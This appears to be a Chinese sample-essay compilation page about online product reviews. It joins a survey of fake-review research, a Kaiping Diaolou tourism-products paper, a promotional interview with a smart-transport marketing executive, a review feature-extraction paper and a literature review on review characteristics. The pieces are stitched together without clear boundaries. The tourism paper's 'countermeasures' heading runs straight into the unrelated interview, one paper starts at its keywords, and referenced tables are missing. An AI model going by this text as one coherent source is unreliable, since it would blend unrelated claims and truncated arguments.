前言:一篇好文章的誕生,需要你不斷地搜集資料、整理思路,本站小編為你收集了豐富的商品評論主題范文,僅供參考,歡迎閱讀并收藏。
(1華中師范大學湖北省電子商務研究中心 湖北 武漢 430079
2華中師范大學信息管理學院 湖北 武漢 430079)
摘 要:界定商品虛假評論的概念、稱謂和效用度量,總結了虛假評論形成與影響機制,包括虛假評論形成的影響因素以及虛假評論對消費者的影響研究。虛假評論形成和影響機制應結合內部、外部環境,構建全面的理論框架。
關鍵詞 :在線商品;在線評論;垃圾評論;虛假評論
中圖分類號:TP391 文獻標識碼:A doi:10.3969/j.issn.1665-2272.2015.14.016
*基金項目:國家大學生創新性實驗計劃(A類)基因項目“在線商品評論信息形成機制的實證研究”(項目編號:A2014080)。
收稿日期:2015-04-22
隨著B2C電子商務模式的日趨成熟,當在網絡上做出購買商品和服務的決策前,消費者已經開始嚴重依賴于相應的在線商品評論。有效的在線商品評論為市場提供了一個有力的校正機制,并以此幫助和促進市場商品的質量的提升。然而,由于存在利益或名譽上的誘惑,一些組織和個人利用網絡信息監管制度的缺失,大量虛假評論從而達到誤導消費者和獲取自身利益的目的,嚴重地危害了網絡購物環境和秩序。因此對在線商品虛假評論的定義、稱謂、效用度量進行界定,綜述在線商品虛假評論形成的影響因素及虛假評論對消費者的影響情況,對后續的研究具有重要的借鑒作用。
1 基本概念
1.1 虛假評論的定義
最先提出在線商品虛假評論概念的學者是Jindal教授,他們將虛假評論定義為三種類型:一種是不真實的評論,指故意誤導消費者或評論識別系統,目的是蓄意提高或毀壞產品的聲譽,具體包括宣傳性評論和誹謗性評論;一種是不含觀點的評論,指評論中并不包含作者的觀點;一種是只與品牌有關的評論,指評論的內容不是直接關于產品的評價而是關于該公司或者供貨商。隨后Luca等學者基于Jindal的定義又增加了偏離主題的評論這以概念,指評論雖然屬于該類型產品的評論,但是和商鋪銷售的產品無關,如產品是蘋果手機,評論卻關于三星手機。
1.2 虛假評論的稱謂
國外學者從商品垃圾評論屬于商品觀點中的垃圾觀點出發,稱其為opinion spam和review spam;從商品垃圾評論固有的欺騙性質出發,稱其為fake review;從商品垃圾評論是由人工產生的途徑出發,稱其manipulative review;從商品虛假評論被用于迷惑其他消費者的用途出發,稱其為deceptive review和suspicious review。與此不同的是,國內學者大多從商品虛假評論的欺騙性質出發,直接稱其為虛假評論。也有少部分學者沿用國外學者的叫法稱為垃圾評論,但這一稱謂在國內總體使用度不高。原因是垃圾評論在國內是一個更為廣義的概念,包括博客中的垃圾評論、社交網站中的虛假評論、論壇中的虛假評論、在線購物網站中的虛假評論,“虛假評論”則特指在線購物網站中的虛假評論。
1.3 效用度量
對于評論效用的度量,需要考慮評論的可信度和有效性。可信度指信息被信任的程度,強調評論真偽性的辨別,即評論人提供的信息被接受者認可的程度。評論有用性是評論對讀者潛在的幫助價值,即評論的效用價值。評論有用性的研究包括有用性影響因素研究和基于效用的推薦排名研究兩方面,通過預測評論的效用價值,提取出效用更高的真實評論或依據評論內容對消費者進行個性化推薦。現階段學者主要以消費者利用他人評論后購買的產品是否滿意為標準來判斷評論是否有用。如圖1所示,在虛假評論識別中通過可信度篩選出一部分虛假評論1,再通過有用性為指標篩選出剩余的虛假評論2,有用的評論則作為輔助消費者正確購買的效用價值高的評論。
2 虛假評論形成與影響機制
2.1 虛假評論形成的影響因素研究
Luca等研究了關于酒店的在線評論,通過分析Yelp虛假評論識別系統認定的虛假評論,發現了三個規律:當酒店的名譽排名靠后時更易實施虛假評論的行為;連鎖店不易實施虛假評論行為;當酒店競爭激烈時,更易向競爭企業虛假評論。由此得出商家實施虛假評論行為是出于競爭和名譽的誘因而不僅僅是商家的不道德。孟美任等進一步采用實證分析的研究方式,對淘寶網上18家網店的評論進行為期一年的追蹤分析,同時線下調研20個商家,總結出四個方面的動機:推銷、詆毀、干擾、無意義。即商家出于增加商鋪銷量的目的推銷評論;同行競爭者出于不良商業競爭詆毀評論;商家關于其他方面的廣告宣傳及鏈接屬于干擾評論;顧客出于敷衍、獎勵機制、單純發泄情緒而的評論屬于無意義評論。因此,如圖2所示,筆者將虛假評論的動機總結為三個方面:一是商家出于推銷、廣告的目的對購買商品的客戶虛假評論;二是客戶出于敷衍、獎勵機制、發泄情緒的目的對商家虛假評論;三是商家之間出于不道德、不良競爭的目的互相虛假評論。另外,非虛假的商品評論應該由購買該商品或服務的客戶,我們將其動機總結為:分享欲望、社會互動、產品參與度。
2.2 虛假評論對消費者的影響研究
有些學者從在線評論的不同維度出發研究虛假評論對消費者購買決策產生影響。瓦瑜等通過實證分析的方法,證實了評論者專業性、可信性,評論質量、評論量、評論效價通過產品感知價值對消費者的購買意愿存在正向影響;消費者專業性通過產品感知價值對消費者的購買意愿存在負向影響。鄭小平等發現評論內容的質量、評論者信譽度、評論數量會產生促進影響,寧連舉等詳細為評論情感負面程度、評論內容相關性、評論內容專業性、評論數量會正向影響消費者瀏覽網站時的感知風險,進而影響其購買意愿。劉麗等具體研究了體驗型產品的負面在線評論,補充了評論長度、評論表達方式對消費者感知風險均有顯著影響。
有些學者對影響在線評論發揮效力的諸多因素進行了重要程度研究。瓦瑜等發現感知價值對消費者購買意愿存在中介作用,評論質量、評論量、評論效價通過產品感知價值對消費者影響程度最高。劉麗等認為評論內容對感知風險的影響最大,同時證實對于負面在線評論相似性對感知風險的影響有正向顯著作用。周晶晶等問卷調查后的排序結果依次是評論的數量、評論者的信譽度、評論內容的質量和評論的效價。總體來看,虛假評論屬于商品評論,會通過以上諸多因素作用于消費者的購買決策,但是直接關于虛假評論對消費者購買決策以及商家商品銷量的影響的研究仍有待完善。
3 結語
當前關于在線商品評論的形成與影響機制研究缺乏統一的研究框架和通用的概念模型,且現有的研究成果比較零散,絕大部分的研究范圍僅局限于特定問題,研究成果缺乏通用性和系統性。
因此,今后對虛假評論形成機制的研究,不僅僅從心理角度出發進行消費者、商家間的動因分析,而且可從虛假評論者形成虛假評論的順序出發,將形成機制分為三步驟:評論構思階段、評論寫作階段、評論發表階段。評論構思階段級,指用戶在腦海中形成評論內容的時期,可研究其他評論信息、用戶的心理狀態、用戶的情感傾向等對用戶構思的影響;評論寫作階段,指用戶寫作評論的過程,可研究用戶個人習慣、用戶評論動機、用戶用語方式等方面;評論發表階段,指用戶點擊發表評論,可研究商家的鼓勵機制等影響因素。
參考文獻
1 Luca M,Zervas G.Fake it till you make it: Reputation, competition, and Yelp review fraud[J]. Harvard Business School NOM Unit Working Paper,2013(6)
2 孟美任,丁晟春.虛假商品評論信息者行為動機分析[J].情報科學,2013(10)
3 瓦瑜,汪蕾.在線評論對消費者購買意愿的影響研究——基于信息傳播的視角[D].杭州:浙江大學,2014
4 鄭小平.在線評論對網絡消費者購買決策影響的實證研究[D].北京:中國人民大學,2008
5 寧連舉,孫韓.在線負面評論對網絡消費者購買意愿的影響[J].技術經濟,2014(3)
旅游商品是旅游者游覽活動的延伸與繼續,是衡量一個國家和地區旅游業發達程度高低的標志。同時,旅游商品是發展旅游購物的基礎,旅游商品的開發創新是旅游購物可持續增長的關鍵。在一般的旅游過程中,吃、住、行、游、購、娛六項旅游花費前四項是基本固定的、“有限”的花費,而旅游購物則是“無限”花費。旅游購物作為“無限”花費,在旅游產品的構成要素中可挖掘的經濟效益的潛力最大,做大做強旅游商品產業對開平本地區旅游經濟的進一步發展具有十分重要的現實意義。
(一)提高旅游收入,促進地方經濟發展
成功的旅游區開發經驗表明,旅游商品的開發生產能夠帶動當地的經濟活力,提高居民的經濟收入,以及政府的財政收入。根據近幾年的統計數據顯示,旅游者在江門市的旅游消費構成中,旅游購物所占比例不足10位數,這反映了購物成為當地旅游六大要素中最薄弱的環節。豐富購物活動,是江門旅游取得進一步發展的關鍵。
(二)豐富本地產品,調整產品結構
通過調整本地農產品與手工藝品的的產品結構,優化資源整合,引導旅游商品廠家走特色產品之路,進一步拓寬銷售渠道。一來可以提供更多的就業機會,再者豐富了開平景區旅游商品的多元化。
(三)提升當地旅游商品文化品位
旅游商品是旅游景區文化的物化和延伸,游客對開平碉樓與村落文化和生態的認可,進而引申為對工藝品、紀念品、土特產品的認可,并通過這種購買行為,達到與開平文化和生態的另一種感悟和交流。地方特色商品兼具地域性、文化性、品牌性,因而有利于以“購”來豐富開平旅游的內涵,從而與世界文化遺產形成旅游購物商品及其購物場所方面的匹配。
二.開平碉樓與村落旅游商品開發存在的主要問題
(一)旅游購物所占比重偏低
在開平碉樓與村落申遺成功的直接刺激下,2007年江門全年接待游客1460.75萬人次,比上年增長38.12%。其中城市接待過夜國際旅游者47.95萬人次,同比增長37.54%,一日游游客784.14萬人次,同比增長73.87%;開平旅游出現了“井噴”效應,主要旅游景點旅游人數激增300%。開平市旅游總收入11.26億元,增長40.93%①。
中國社會科學院旅游研究中心的魏小安研究員認為,中國的旅游購物市場未來的發展目標應該是世界的平均水平——30%。然而根據開平市旅游局公布的數據,旅游者在開平的旅游消費構成中,旅游購物所占比例卻連百分之十都不到。
(二)旅游商品開發還處于粗放階段
通過實地旅游體驗調研,“開平碉樓與村落”這一世界文化遺產地的地方特色商品資源還缺乏全面調查,開發處于粗放狀態。具體表現在:
1.旅游商品研發力度不夠,產品結構欠合理
開平本地目前大多數旅游商品生產企業規模較小,未能形成規模效益。此外,還存在部分極具本土特色的商品被忽略,在現代工業品大潮中逐漸邊緣化,甚至消失,亟待深度挖掘。
2.旅游商品特色不鮮明
作為世界文化遺產,開平碉樓文化內涵豐富、特色鮮明。一些體現歷史文化及地域特色的旅游商品,還遠遠不能滿足各類游客的廣泛需求,且也無法與世界文化遺產的身份匹配。特色明顯、文化含量高的商品所占比重還很小,缺乏拳頭產品。
3.質量意識不強,包裝層次低
本地區僅有的數家旅游商品生產企業尚處于作坊式生產經營狀態,由于其在資金、人力、技術等方面的限制,使得部分旅游商品做工粗糙,檔次較低。偷工減料、以次充好、以假亂真的現象也較普遍,嚴重挫傷旅游者的購買積極性。
此外,許多景點購物環境混亂,產品單一, “回扣”現象普遍存在,售后服務不完善。
(三)政府對開平碉樓與村落旅游商品的開發工作收效甚微
伴隨“申遺”工作,江門市政府和市旅游局一直非常重視開平碉樓與村落景區的建設和發展,并通過舉辦評選優秀旅游商品相關活動支持當地旅游特色商品的發展,但是旅游商品消費在開平的旅游收入占的比例仍舊很低,舉辦的有關活動產生的實際效果并不顯著,導致勞民傷財且收效甚微。
三.開平碉樓與村落旅游商品的資源優勢與特點
(一)開平碉樓與村落旅游商品開發的優勢與特點
開平碉樓與村落深厚的文化影響優勢主要是源自其馳名中外的中西方結合的僑鄉文化、獨特而且具有地方文化特征的建筑藝術。同時,開平碉樓與村落景區地處廣東中南部、珠江三角洲西緣,屬南亞熱帶地區。受海洋氣候影響,潮濕多雨,年降雨量在1700至2400毫米之間,屬于丘陵地帶,但東部和中部部分地區為潭江沖積平原。有著獨到的氣候優勢,決定了本地區具備豐富的物產資源。
(二)開平碉樓與村落旅游商品的譜系
經過多次的走訪調查,得出開平本地現有的和潛在的大致旅游商品譜系如下
綠色食品類:潭碧冬瓜、開平廣合腐乳、外海面、金山火蒜、水口白菜、陂頭桂味荔枝、農家肥蔬菜、臺山蝦醬、古勞豆豉、聯竹果蔗、金雞番葛、龍勝甜橘、馬岡鵝
中草藥保健類:錦云單樅茶、東山蜂蜜、新會陳皮、鶴山桔普茶、荷塘頭菜、開平蘆薈、健之源靈芝補品、鄉土味響山簕菜茶、開平陳皮茶、開平陳皮梅
旅游紀念品類:碉樓微縮模型、碉樓積木、碉樓紙牌游戲、傳統工藝品如碉樓茶磚、皮雕系列工藝品、輕工小紀念品、有紀念意義的文化衫及絲綢、紡織品(如LG服飾、牛仔服裝)
旅游文化類:明信片、畫冊、郵冊、開平名人相片集、開平名人書法藝術集、開平名人繪畫藝術集、碉樓故事集
宗教類:佛教、道教、基督教、伊斯蘭教
旅游用品類:旅游箱包、首飾盒、生活用品、醫療保健用品
旅游書刊類:導游圖、導游手冊、美食路線圖、地方雜志
四.開平碉樓與村落旅游商品開發對策
在前不久CCTV發現之旅頻道的《華商論見》欄目的拍攝現場,我們看到了常州愛爾威智能科技有限公司的營銷副總何春華。整個錄制過程中,何春華就如何認知品牌價值和樹立品牌等話題侃侃而談,給現場的其他企業家及記者都留下了深刻的印象。
(左二:何春華)
“雖然哥不在江湖,但江湖還有哥的傳說”
提起何春華,可能很多人并不熟悉。但對于臺灣旺旺集團的人來說,這個名字在整個集團內部以及快消品行業中是有著響當當的地位的。何春華在九十年代就加入了旺旺集團,開始了長達20年的快消品市場營銷管理工作。他曾經提出的一些營銷理念和渠道建設模式至今也都還在被眾多的后來人學習與效仿。離開旺旺集團后,他進入香港海德實業有限公司,開始負責公司的項目設計與全國的項目布局等工作。在談到這兩段工作經歷的時候,我們聽到的最多的關鍵詞就是“速度”與“深度”。這不僅讓我們產生了一個問題,那就是為什么會從相對比較成熟的傳統行業一步跨入到智能硬件設備這個目前還相對小眾的領域呢?
針對這一問題,何春華是如此回答的:“其實對于營銷人員來說做什么行業不重要。產品只是企業文化和銷售理念的載體。每一個營銷人員的希望都是能在一個好的平臺上,實現屬于自己的理念與價值。那么,從“衣食住行”這些跟民生息息相關的行業看,我以前大部分時間是在做跟“食”這個方面有關的事情。對于現階段的國人來說,在已經解決了“食”這個問題的當前,大多數人開始對“行”這一塊提出了更多的需求。從發展的角度看,這就是一個大平臺。
選擇愛爾威公司,是一種機緣巧合,也是一種必然。愛爾威是一家專業研發、生產智能交通工具的企業,并且這家企業非常強調技術的高效轉換與市場的快速滲透。這和我做事情所追求的“快速”是不謀而合的,所以這是一種緣分。雖然目前智能硬件設備的確屬于比較小眾的市場,但幾乎所有人都認識到了智能化時代的趨勢。所以,從市場角度看,今天的“小”恰恰印證了明天的“大”。而這正是必然!“
“天下武功,唯快不破”
“互聯網思維”的誕生,給很多傳統行業都帶去了沖擊、顛覆甚至毀滅,對此相信很多人都深以為然。新興的互聯網行業正以強勁的勢頭擠壓著傳統行業的生存空間,對于這一點,何春華用道家的理論做出了獨特的解讀。
“世間萬物最終都會歸于平衡,這是一種規律,就是我們常說的‘道’。現在的互聯網思維與經濟之所以被人們推崇,最主要的原因是順應了時代的潮流,符合了消費者的需求。而傳統行業在應變上慢了,導致了這樣一種此消彼長的局面。但是從越來越多的線上企業和線下企業加強相互之間的互動和異業合作可以看出,誰把誰顛覆掉都是個偽命題,正確的理解應該是‘借鑒與融合’,最終還是一個詞:歸于平衡,產生一種新的商業模式。
在當今這個互聯網+的時代,一個顯著的特點就是‘以快制快,以快打快’。不管是哪一類企業都應該對市場的變化做出快速反應。在出行交通工具這個行業,我接觸過很多傳統實體經銷商,他們正面臨著本行業市場飽和、利潤瓶頸、品牌寡頭等問題的困擾,面對互聯網運營與智能時代的來臨,他們充滿了疑惑和焦慮。
對于這些仍停留在傳統模式中的人,如何讓他們快速擁抱互聯網,并且快速獲得過硬的智能硬件技術支持,從而成功轉型,這就是愛爾威想要去實現的。利用我們的專業和對渠道的感同身受,去引導傳統經銷商們做出正確的決策,讓他們能更全面的去認識智能交通產業的發展預期,在市場井噴期到來之前找準自己的位置,做好卡位的工作。
所以,我們將以愛爾威自身對傳統行業與新興行業的跨界優勢、渠道建設的經驗、以及實際的輔銷行為等,來協助我們的渠道客戶打好這場行業的轉型戰役。”
關鍵詞:產品評論;產品特征;特征提取;評論挖掘
中圖分類號:TP311 文獻標識碼:A 文章編號:1009-3044(2016)14-0159-03
A Product Feature Extraction Method Based on Customer Comments
TU Shun-lin, LIU Li, LI Wei-hua, ZHAO Yi-xia
(Department of Computer Science, Huizhou University, Huizhou 516007, China)
Abstract:The paper combine with the characteristics of Chinese proposed an approach to obtain product features set.Part-of-speech tagging and statistics are used to get the candidate product features set,then use pattern matching to tailors the candidate product features set and filtered it according to the stop words library.Finally the product features set are obtained. The proposed method was tested with the real clothing reviews which were obtained by scrawler technology from Internet and the results show that the validity of the method is proved preliminarily.
Key words: product reviews;product features ; features extracting;review mining
1 概述
電商的蓬勃發展與規模的迅速壯大,越來越多的人選擇網購的同時也導致越來越多產品評論的積累。Web上的評論信息是海量的無結構化數據,企業和客戶想要從產品中獲得信息只有通過人工閱讀的方式進行,而這是一個消耗時間而且容易產生錯誤的過程[1]。如此處理并沒有很好地利用這些數據,既不能及時有效地反饋客戶對商品的態度,更難以為企業高層的決策提供輔助,由此“評論挖掘”應運而生。評論挖掘作為非結構化信息挖掘的一個新興領域,主要涉及網絡評論中的情感分析、產品特征提取以及主觀內容識別等[2]。與國外比,漢語評論挖掘方法和技術的研究起步較晚,而文化的差異、語言表達方式、詞匯語法等差異也注定很多國外的研究成果無法直接應用到中文評論處理上。因此,結合相關文獻與研究,本文提出一種簡單自動提取出客戶評論中的產品特征的方法,實驗證明該方法行之有效,可為企業建立評論挖掘系統提供參考。
2 客戶評論中的產品特征
產品特征指的是客戶、企業、廠方等對產品本身、產品部件、部件的性能或功能上的抽象概括。一般來說,生產商對于產品都會提供一份描述產品各方面功能和性能的說明文件。對于服裝產品來說,這份說明除了包括品牌、風格、上市年份、材質等服裝的基本屬性外,還包括更多的技術細節,但是這些細節客戶往往都不太感興趣。此外,客戶評論中對于產品特征的描述是一個開放性的問題,客戶可能在產品評論中發表一些企業或廠商根本就沒注意到的一些產品特征,而這些特征正影響著廣大消費者的購買決策。正因如此,需要從產品評論中提取客戶評論中的產品特征[3]。
產品的特征分為顯式特征和隱式特征兩種[4]。顯式特征是直接出現在產品評論中描述產品的性能或功能的名詞或名詞短語。比如說“好喜歡,尺碼挺準,挺合身的”,這里尺碼是顯式特征。而隱式特征就需要對句子的語義進行理解才能提取出來,并沒有在語句中有直接的描述。如“從廣州到佛山給我送了5天我就呵呵了”,其實這里指出了產品物流的這個隱式特征。抽取隱式特征需要自然語言的分析和理解技術,但是目前該技術尚不成熟,所以這里所說的產品特征提取是指顯式特征的提取。
3 產品顯式特征的提取
3.1 人工定義和自動提取
顯式產品特征的提取分人工定義和自動提取兩類方法。
采用人工定義的方法就是從某特定領域的產品評論庫中以人工的方式抽取出產品特征。當產品類型不同或者產品發生改變時,都需要重新構建產品特征集合。這種方法的可移植性、自適應性都比較差,查全率較低。
采用自動提取的方法主要依靠詞性標注、句法分析等方法配合其他的提取技術實現。比如利用NLP分詞及詞性標注技術對客戶評論進行解析,從中提取名詞或名詞短語來作為候選特征詞。此方法的優點是處理速度快,但是只依賴詞性的提取精確度不高。另外有學者提出基于關聯規則挖掘頻繁項集并用支持度進行裁剪的方法提取特征詞,使用這種方法能提取到高頻特征詞但對低頻特征詞提取效果不好[5]。文獻[6]提出一種利用互信息(PMI)的特征提取方法。該方法首先提取出頻率高于某一閾值的名詞或名詞短語來作為候選特征詞,然后利用搜索引擎計算出候選特征詞與產品的互信息,依此確定特征詞與該產品的相關性。但是由于是基于搜索引擎的方法,所以在處理的速度上會比其他方法慢許多。
3.2 產品特征提取方法
本文依據中文特點融合多種產品特征提取方法,提出一種簡單有效的產品特征提取方法。該方法通過詞性標注和統計抽取產品特征候選集,再利用模式匹配對產品特征候選集進行裁剪,最后構建無關詞庫對產品特征候選集進行過濾,得到產品特征。提取過程如圖1所示。
該方法的具體步驟如下:
(1)利用爬蟲程序下載服裝商品評論。
本文實驗數據采用某品牌天貓服裝的評論信息,因此需要設計出合適的爬蟲程序。網絡爬蟲是一種自動提取網頁的程序,提取的數據是半結構化的HTML結構。
(2)過濾無價值的評論信息并形成商品評論庫。
爬蟲下載的源文檔HTML結構中包含大量的與商品評論無關的內容。如HTML文檔的頭部和尾部信息、外部資源的鏈接、客戶端腳本程序的定義、文檔樣式定義等內容,這些內容均屬于無價值的內容。另外,由于客戶對商品的評論是開放性的,有部分客戶會借此做出惡意的推廣或誤導評論。包含各種聯系方式(電話號碼、QQ號等)和外部鏈接的評論基本都屬于無價值的惡意評論。
(3)利用中文分詞和詞性標注工具處理評論庫。
通過過濾處理的評論數據組成評論庫,評論以句為單位通過分詞工具的處理,同時統計計算出詞語或短語出現的頻率。定義候選詞庫的數據結構為{A,B,C,D},其中A為詞語或短語,B為詞性,C為出現頻數,D為該詞在該句評論中的出現語法模式。如:評論“感覺衣服尺碼偏大”,若“尺碼”在庫中出現10次,則提取結果為{"尺碼","/n",10,"/n/n/尺碼/a/a"},最后形成由詞語和詞性標注的有序排列。
(4)抽取候選特征詞。
由于產品特征值主要由名詞或者名詞短語組成,所以本文關注詞性標注為名詞或名詞短語的分詞結果并將其抽取為候選特征詞集合。每一款服裝商品的所有評論都形成各自的候選特征詞集。
(5)通過半自動的方法建立停用詞庫。
為了節省空間、提高提取效率和準確率,需要過濾某些詞,這些詞稱為“停用詞”。這些詞往往出現頻率較高,但卻不是產品特征,有的甚至沒有什么含義。例如:“給表妹買的,很合身”這樣的句式在評論中是很常見的。其中“表妹”一類的人稱代詞出現的頻率較高,而一般的基于概率統計思想的算法往往會將其認為是“高頻特征”而錯誤提取。因此,使用停用詞庫進行過濾就能較好地解決這一類問題。首先獲取其他類型商品的評論信息,按上述方法抽取出這些商品的特征詞,最后取這些特征詞的交集構建停用詞庫。但是因為有的特征詞如上市時間,物流,外觀等屬于通用特征詞所以需人工挑選出來。
(6)裁剪候選特征詞。
通過統計和模式匹配對候選特征詞進行裁剪。利用統計的方法選取高頻特征詞,并在這些已經選取的高頻特征詞中前后尋找語法模式。然后調整統計的閾值并用語法模式的匹配裁剪以提取低頻的特征詞。最后通過停用詞庫過濾得出最終的產品特征詞集。
4 數據實驗
4.1 特征詞集合
由高頻特征詞以及符合匹配模式的名詞組成,最后通過無關詞庫的過濾的出特征詞集合。采用某品牌天貓店中的1132款服裝的商品信息和對應的17039條有效評論通過本文方法獲取商品特征如下:
其征詞旁的標號為該詞在評論語句中出現的頻數,沒有標號的詞通過匹配模式提取。
4.2 驗證與評價
對產品特征提取方法的性能判斷,可用查全率和查準率進行評價。產品屬性的提取相當于對屬性詞語的二維分類,即真實屬性還是非真實屬性、已提取屬性和未提取屬性的分類。采用列聯表(表2)說明如下:
查全率(R)=A/(A+B);
查準率(P)=A/(A+C);
利用人工識別的方法,可做查全率和查準率的計算,并說明上述方法的準確性[7]。以一款男裝和一款女裝為例,統計結果如下:
某款夏季男裝(id:3953xxx0863)
相對于其他產品特征挖掘方法,本文所提出的方法與其他方法的結果比較如表5所示。以上述兩款服裝為例,算得查全率和查準率的平均值分別為66.19和85.25。
通過比較,表明本文方法對于商品評論中的特征提取有著較高的查準率,但是明顯的查全率偏低,基本保持在66%左右。這主要是由于低頻特征詞的獲取是由匹配模式決定的,個別的產品特征出現頻數較少以及網絡評論句式的自由化、多樣化都給匹配模式的準確構建提出了更高的要求。隨著匹配模式的進一步研究與改進,相信將會取得更好的效果,同時這也是本文今后的研究方向。總之,從實驗結果來看基于詞性標注和統計并利用模式匹配對候選特征詞進行裁剪的產品特征提取方法還是比較有效的。
5 總結
產品特征不僅是影響客戶做出商品購買決策的重要因素,也是企業為提高產品和服務質量、提高收益的關鍵。而產品特征提取是產品評論挖掘的重要方面,更直接影響到評論挖掘系統的性能。本文提出的方法能夠有效地從商品評論庫中提取出商品特征值,并以真實評論數據為實驗,表明了該方法的有效性,可為企業構建評論挖掘系統作參考。
參考文獻:
[1] 伍星,何中市,黃永文.產品評論挖掘研究綜述[J].計算機工程與應用,2008,4(36):37-40.
[2] 李實,葉強,李一軍,羅嗣卿.挖掘中文網絡客戶評論的產品特征及情感傾向[J].計算機應用研究,2010,27(8):3016-3019
[3] 郗亞輝, 張明, 袁方,等. 產品評論挖掘研究綜述[J]. 山東大學學報:理學版, 2011, 46(5):16-23.
[4] 王永, 張勤, 楊曉潔. 中文網絡評論中產品特征提取方法研究[J]. 現代圖書情報技術, 2013(12):70-73.
[5] 李培. 產品評論挖掘的觀點抽取和分類技術研究[D]. 重慶大學, 2009.
關鍵詞:在線產品評論;文本評論;文本挖掘技術
基金項目:教育部人文社會科學研究青年基金項目:“網頁中產品屬性文本信息對消費者購買決策的影響機制研究”(編號:14YJC630204)
中圖分類號:F724.6 文獻標識碼:A
收錄日期:2015年5月31日
網絡購物用戶在網上購物時很多人都會瀏覽參考其他人對商品的評論信息,并且在購物后進行在線評論。2006年開始對在線產品評論的研究不斷增多(李恒,2015)。由于該研究主題涉及信息系統、電子商務、消費者行為、圖書與情報科學等多個不同領域的交叉,相關研究文獻較難得到系統性的整理。本文擬從在線評論的特征、作用、分析技術這三個方面對這些文獻進行梳理。值得注意的是,由于文獻涉及范圍過于廣泛,為了使本文綜述主題聚焦,文中關于在線評論的文獻僅局限于商家購物網站的購買者評論,也稱為在線產品評論。其他在線評論或者在線口碑形式不在討論之列,比如第三方平臺的評論(影評、試乘試駕評論、點評網站評論等)、社交媒體中的產品或企業評論(各類口碑、輿情、內容營銷及互動等)。
一、在線產品評論特征
李恒(2015)把消費者的在線評論特征總結為分屬于評論星級和文本評論兩種形式下的12種維度。其中,評論星級指的是購買者對該次購物的總體評價。這種形式中沒有分出更多的維度,因此評論星級就是一個維度。在文本評論這一形式中,有評論標題、評論內容一般特性、評論內容的語義特征、評論內容的時間特性這四類。在這四類中分別包含了評論標題、評論質量、評論數量、評論長度、評論差異性、評論效價、評論類型、評論可讀性、評論強度、評論及時性、評論時效性等11個維度。這12個維度具體的隸屬關系以及其研究焦點屬性本文將其整理至表1中。接下來本文針對表1中的各種在線評論特征維度和其研究焦點屬性逐一進行解釋。(表1)
評論星級指的是購買者對該次購物的總體評價。這種形式中沒有分出更多的維度,因此評論星級就是一個維度。通常的研究焦點在于評論星級的極端性與中立性的作用。以大部分購物網站采用的五星評分制度為例,評論星級的極端性即一星為代表的極端負面評價與五星為代表的極端正面評價,而三星反映中立態度。
接下來的文本評論中包含了網購用戶有文字留言內容的評論中的各種特性的研究維度。大略可以分為文本評論標題和文本評論內容兩類,文本評論標題是評論者對評論內容的文本概括,在除了在線產品評論以外的在線評論中比較常見。通過評論者自擬的標題使瀏覽者容易從標題的關鍵詞以及總體情感傾向中搜索以及快速知曉評論整體內容,但是在購物網站的用戶評論中設置標題的并不多,比如國內的淘寶、京東等購物網站的用戶評論中均沒有設置文本評論的標題。因此,本文中不再贅述。文本評論內容就是網購用戶用文字留下的購買感受的評價內容,李恒(2015)將其特性分為一般特性、語義特征和時間特性三類。本文在介紹完表1這些特征之后,再對其中未包含的一些特征進行補充。
評論內容的一般特性包括評論的質量、數量、長度和差異性。其中,數量和長度比較好理解,就是該產品下購買者的累計評論的總數和評論的文字字數長度,其研究屬性也是總數和字數長度的計量值。評論質量特性借鑒了霍夫蘭德的說服模型中信息內容對說服效果的影響作用,強調了在線產品評論作為消費者用來參考購買的有用信息,信息的瀏覽者對于產品評論信息的真實性、可靠性、內容與其所評價的產品的相關性以及是否為后續購買者提供了大量有用的信息這幾個方面的主觀感知(郭國慶,2010;李宏,2011)。其研究屬性也基本圍繞這幾個有關信息質量評價的主觀因子展開。評論差異性,即評論離散度,能顯示不同評論中購買者態度或觀點上的分歧程度。其研究屬性通常采用評論者對網絡平臺設置的評分項打分的方差或標準差來度量。
評論內容的語義特征包括評論的效價、類型、可讀性和強度,這些特性都與文字評論的文本內容的表達有關。簡單來說,效價代表了文本內容的詞語描述中總體體現出來的情感傾向,其研究屬性有正面、負面和中立(或綜合)之分;類型代表了文本詞語中對產品屬性及其體驗的描述是客觀還是主觀之分;可讀性代表了評論文本詞語中每個評論者其自身帶有的語言習慣表達、拼寫、詞匯選擇、句長句式語法等是否容易讓瀏覽閱讀的人理解,因此其研究屬性也是瀏覽評論者的一種主觀性的感知(Korfiati,2012);強度代表了評論文本詞語措辭中表現出的情感態度的強烈程度,其研究屬性主要集中于瀏覽者對負面口碑中負面情緒強度的感知程度(黎小林,2007)。
評論內容的時間特性包括及時性和時效性,這兩條特性與評論的時間信息有關。評論及時性代表評論時間與購買時間的間隔遠近,研究屬性是評論發表的天數,但是究竟天數長好還是短更好可能并不是簡單的線性關系,因此到底是否及時的判斷也就比較模糊了;而時效性代表評論時間與現在(瀏覽時間)間隔遠近,以及是否在最近有頻率較高的密集評論,這反映了該產品的近期火熱與流行程度,研究屬性是評論瀏覽者對時效性強與弱的主觀評價(劉逶迤、逯萬輝,2010;郭國慶等,2010;龔思蘭等,2013)。
其他表1中未提及的較為重要的特性還有評論者特征等等。評論者的特征包括評論者是否匿名(身份知否披露)、評論者的專業性、評論者的聲譽、排名等等(Racherla P,Friske W,2012;Hyunmi et al.2012)。這個部分我們只是將這些現有研究中涵蓋的特征進行了簡單歸類和羅列,其中有些特征在技術、功能和研究范式發展過程中會出現不同程度的交叉重疊和所屬類別上的變化,在后文中會有所提及。
二、在線產品評論作用
以上談到的是在線產品評論的特征,對于在線產品評論的功能研究者們也有所探討。在線評論的功能一方面包含有大量產品屬性、使用價值方面的描述信息可以給潛在購買者信息上的借鑒,幫助他們降低不確定性風險;另一方面評論中含有大量購買的情感體驗和表達信息,對商品有強大的推薦作用,大量比較集中的正面或者負面評論會引起潛在購買者的從眾行為,影響他們購買或者不購買的最終決定。遵從這些意見購買產品(Park DH,et al.2007;Duan W J,et al.2008)。關于評論功能的衡量焦點主要集中在評論信息質量(評論有用性),評論可信度和消費者態度形成與改變以及具體的銷量數據等。
